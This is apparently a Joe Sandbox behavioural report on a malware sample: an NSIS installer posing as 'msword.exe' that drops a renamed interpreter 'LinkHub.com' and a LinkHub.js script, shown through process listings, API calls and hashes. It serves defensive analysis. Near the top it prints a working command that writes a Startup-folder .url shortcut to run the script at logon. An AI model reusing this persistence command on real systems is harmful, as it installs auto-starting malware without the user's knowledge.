Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:19:40
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:19:41
Start date:	11/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6fb430000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:19:41
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xdd0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:19:53
Start date:	11/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6fb430000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:19:54
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xa10000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	25
Total number of Limit Nodes:	0

Executed Functions

Function 04608A48 Relevance: 4.2, Strings: 3, Instructions: 481
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4L^q, xrefs: 04608B1C
4L^q, xrefs: 04608C50
4L^q, xrefs: 04608BB6

Memory Dump Source

Source File: 00000002.00000002.1683391920.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4600000_powershell.jbxd

Similarity

API ID:
String ID: 4L^q$4L^q$4L^q
API String ID: 0-1735365799
Opcode ID: 1cc05f87284c518f7291ac8ed48cdf4827588f5d4fde44294854290d515f2afd
Instruction ID: df06d99c6a338b1be5dd4837d8bd8b954fa937407dbfc88968cea329360bb55d
Opcode Fuzzy Hash: 1cc05f87284c518f7291ac8ed48cdf4827588f5d4fde44294854290d515f2afd
Instruction Fuzzy Hash: E7125970A002049FDB18EF64C4947AEBBF2BF88314F14C5ADD50A9B396EB75A845CF91

Function 0460950E Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1683391920.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2737057b40c42d9aeb120ace813605e2d01832aed962806e623e87fac8a102f1
Instruction ID: 4f58907d7f1a03ad5ddc701f9e28db071a6491d7d05356d7c7233b96ba93c7ec
Opcode Fuzzy Hash: 2737057b40c42d9aeb120ace813605e2d01832aed962806e623e87fac8a102f1
Instruction Fuzzy Hash: AFC11BB1E10219DFDB28CFA9C88479EBBF2BF48314F258529E405A7391E770A945CF91

Function 04607E8C Relevance: 1.8, APIs: 1, Instructions: 284
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 046097B5

Memory Dump Source

Source File: 00000002.00000002.1683391920.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4600000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ad956fb734c8e4da35e2b6820c9ec7837e3b185b0b9bd149b936670651194b13
Instruction ID: ea309c98f96da934a9ea51dd2e9704c8d49b7d1351f08cc3f28adae2e9d1cc28
Opcode Fuzzy Hash: ad956fb734c8e4da35e2b6820c9ec7837e3b185b0b9bd149b936670651194b13
Instruction Fuzzy Hash: 3CC11AB1E10219DFDB28CFA9C88479EBBF2BF48314F158529E405A7391E770A945CF91

Function 04607E98 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(00000004), ref: 04609947

Memory Dump Source

Source File: 00000002.00000002.1683391920.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4600000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 721d4a0a3d20b9eb138c0f4cc977bf021feeaf6f3daecace724e8cd363d718bc
Instruction ID: 78a792606c7a1d1331bcfd0f8c9bf2e2e901f1c71d900ff93201fb6a669a65e8
Opcode Fuzzy Hash: 721d4a0a3d20b9eb138c0f4cc977bf021feeaf6f3daecace724e8cd363d718bc
Instruction Fuzzy Hash: 4D1140B19002488FDB20DF9AC548B9EBBF4EB88320F24842AD518A7350D774A844CFA4

Function 046098E2 Relevance: 1.5, APIs: 1, Instructions: 47
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(00000004), ref: 04609947

Memory Dump Source

Source File: 00000002.00000002.1683391920.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4600000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 74bf4974c0c73992b930d0bbd74c72531c54e2154c3aef3b2b816cc23e8b2bd3
Instruction ID: 94b05781dba60218c056a99388afba00d4c99c214816814ef256fc8c3d8c36f5
Opcode Fuzzy Hash: 74bf4974c0c73992b930d0bbd74c72531c54e2154c3aef3b2b816cc23e8b2bd3
Instruction Fuzzy Hash: BD1152B19002488FCB20CF9AD588BDEBFF4AB88324F24846AD558A7350C774A844CFA5

Analysis Process: msword.exePID: 8876, Parent PID: 7580COMMON

Execution Graph

Execution Coverage:	18.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.1%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

SeShutdownPrivilege, xrefs: 00403C16
~nsu.tmp, xrefs: 00403AF7
NCRC, xrefs: 0040397C
1C, xrefs: 00403B56
/D=, xrefs: 004039A6
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64
Error launching installer, xrefs: 00403A7D
\Temp, xrefs: 00403A1B

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
